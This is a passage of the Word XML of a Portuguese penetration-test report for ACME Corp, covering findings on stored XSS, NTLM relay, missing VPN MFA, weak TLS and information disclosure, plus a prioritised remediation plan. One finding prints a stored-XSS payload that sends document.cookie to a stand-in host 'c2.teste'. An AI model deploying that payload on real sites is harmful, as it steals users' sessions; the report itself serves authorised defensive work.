        <w:t xml:space="preserve">CVSS 6.5 · CWE-308 · Rede · Afetado: vpn.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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O acesso remoto via VPN depende apenas de usuário e senha, sem segundo fator, ampliando o impacto de credenciais vazadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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Acesso inicial à rede interna a partir de credenciais comprometidas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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Exigir MFA resistente a phishing (FIDO2/WebAuthn) no acesso remoto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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F-05 — Cross-Site Scripting armazenado em avaliações  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">MÉDIO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 6.1 · CWE-79 · Aplicação Web · Afetado: loja.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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Payloads persistem no campo de comentário de avaliação e executam no contexto de outros usuários, permitindo roubo de sessão e ações em nome da vítima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload persistente em avaliação de produto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&lt;img src=x onerror="fetch('https://c2.teste/'+document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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Sequestro de sessão de clientes e potencial fraude.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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Codificação de saída por contexto, sanitização no servidor e Content-Security-Policy estrita.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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F-06 — SMB signing desabilitado (NTLM relay)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">MÉDIO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 5.9 · MITRE T1557.001 · Rede · Afetado: 10.20.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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Hosts sem assinatura SMB permitem o relay de autenticação NTLM, viabilizando autenticação como a vítima em outros serviços.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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Movimentação lateral e acesso não autorizado a recursos de rede.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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Habilitar/forçar SMB signing via GPO e desabilitar NTLM onde possível.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB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F-08 — Cabeçalhos de segurança e configuração TLS fracos  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">BAIXO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 3.7 · CWE-693 · Configuração · Afetado: loja.acme.example, api.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB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Ausência de cabeçalhos como HSTS, X-Content-Type-Options e CSP, além de suites TLS legadas habilitadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB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Facilita ataques de downgrade, sniffing e injeção de conteúdo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB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Adicionar HSTS, CSP e cabeçalhos defensivos; desabilitar suites TLS legadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB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F-09 — Divulgação de informação em mensagens de erro  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">BAIXO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 3.1 · CWE-209 · Aplicação Web · Afetado: api.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB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Respostas de erro expõem stack traces e versões de componentes, auxiliando o atacante na construção de exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB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Reduz o esforço de reconhecimento do atacante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2563EB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Padronizar respostas de erro genéricas e registrar detalhes apenas no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="20" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-10 — Divulgação de versões de software (banners)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">INFO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 0.0 · CWE-200 · Configuração · Afetado: loja.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Banners de serviço revelam versões exatas de nginx e do runtime, úteis para correlação com CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Informativo; contribui para o reconhecimento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Ocultar/normalizar banners e cabeçalhos de versão.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SEÇÃO 6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Plano de Ação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Roteiro priorizado por risco e esforço. Os quick wins (alto impacto, baixo esforço) vêm primeiro; o gráfico de prazos mostra o que leva mais e menos tempo.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Roteiro de remediação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57175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2857500" cy="1800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Itens de correção priorizados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Janela</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="7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pct" w:w="51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Ação de correção</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="11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Esforço</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8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pct" w:w="7%"/>
            <w:shd w:fill="194FE3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QW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="B91C1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Imediata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Fixar o algoritmo esperado (ex.: RS256) no verificador e rejeitar explicitamente "none"; rotacionar segredos e invalidar sessões emitidas.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0B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Baixo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2d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★</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="B91C1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Imediata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Usar consultas parametrizadas/prepared statements e ORM seguro; adicionar WAF como camada defensiva e princípio do menor privilégio no usuário de banco.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59E0B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Médio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5d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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="B91C1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Imediata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Validar a propriedade do objeto no servidor (order.customer_id == session.user_id) e usar referências indiretas por usuário; incluir testes de autorização por objeto.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0B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Baixo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3d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★</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EA580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Curto prazo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Adotar gMSA ou senhas longas/aleatórias para contas de serviço; monitorar solicitações TGS-REQ anômalas e remover SPNs desnecessários.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EF4444"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Alto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20d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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EA580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Curto prazo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Codificação de saída por contexto, sanitização no servidor e Content-Security-Policy estrita.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59E0B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Médio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7d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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EA580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Curto prazo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Habilitar/forçar SMB signing via GPO e desabilitar NTLM onde possível.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59E0B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Médio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10d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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EA580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Curto prazo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Exigir MFA resistente a phishing (FIDO2/WebAuthn) no acesso remoto.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59E0B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Médio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14d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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="2563E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Médio prazo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Adicionar HSTS, CSP e cabeçalhos defensivos; desabilitar suites TLS legadas.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0B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Baixo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3d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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="2563E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Médio prazo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Padronizar respostas de erro genéricas e registrar detalhes apenas no servidor.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0B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Baixo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2d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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="2563E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Médio prazo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F-10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Ocultar/normalizar banners e cabeçalhos de versão.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0B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Baixo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color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">1d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59669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0" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SEÇÃO 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Apêndice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Recomendações estratégicas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color w:val="B91C1C"/>
        </w:rPr>
        <w:t xml:space="preserve">Imediata: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Corrigir o bypass de JWT (F-01) e a SQL Injection (F-02) — exploráveis remotamente sem autenticação.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color w:val="B91C1C"/>
        </w:rPr>
        <w:t xml:space="preserve">Imediata: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Revisar a autorização por objeto na API (F-03) para conter exposição de PII.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color w:val="EA580C"/>
        </w:rPr>
        <w:t xml:space="preserve">Curto prazo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Endurecer o Active Directory: gMSA para contas de serviço (F-04) e SMB signing (F-06).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color w:val="EA580C"/>
        </w:rPr>
        <w:t xml:space="preserve">Curto prazo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Exigir MFA no acesso remoto (F-07) e aplicar CSP/sanitização contra XSS (F-05).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color w:val="2563EB"/>
        </w:rPr>
        <w:t xml:space="preserve">Médio prazo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Padronizar cabeçalhos de segurança/TLS (F-08) e reduzir divulgação de informação (F-09, F-10).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color w:val="2563EB"/>
        </w:rPr>
        <w:t xml:space="preserve">Médio prazo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Reexecutar o engajamento (reteste) para validar todas as correções.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aviso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Relatório gerado por Suricatoos a partir de um engajamento autorizado. Conteúdo confidencial; distribua apenas a partes autorizadas. As provas de conceito foram não destrutivas e limitadas ao escopo acordado.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2"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13"/>
      </w:rPr>
      <w:t xml:space="preserve">Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="13"/>
        <w:szCs w:val="13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2"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="194FE3"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">SURICATOOS</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="14"/>
        <w:szCs w:val="14"/>
      </w:rPr>
      <w:t xml:space="preserve">	ACME Corp · CONFIDENCIAL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3350032812f10ffa652d059ed6679e782f91894.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1e80510c3870d6cc643e1ef31ec4b68812990680.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/14109b56f744d041f899adfe16493bcedc209cbf.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/47361afe943dad5ee5d8d64cc7c4ddfa1f89ce3c.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b60cefa249c3379fccf80c93db66af72c4e374a0.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/28d73e6ab1eb8a71f22691b7c7a698f1fc09e1aa.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/111f30d9bb6f993ef476b2789e9ac3824e19d9f9.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/73c1f06b0ea24c0231e399b21bb873e0082c8ef1.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ccb584920cd23a5fb7c21aa2c72c8aebe6e95e7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de Segurança Ofensiva — Aplicação Web e Active Directory</dc:title>
  <dc:creator>Suricatoos</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-12T19:25:13.683Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-12T19:25:13.683Z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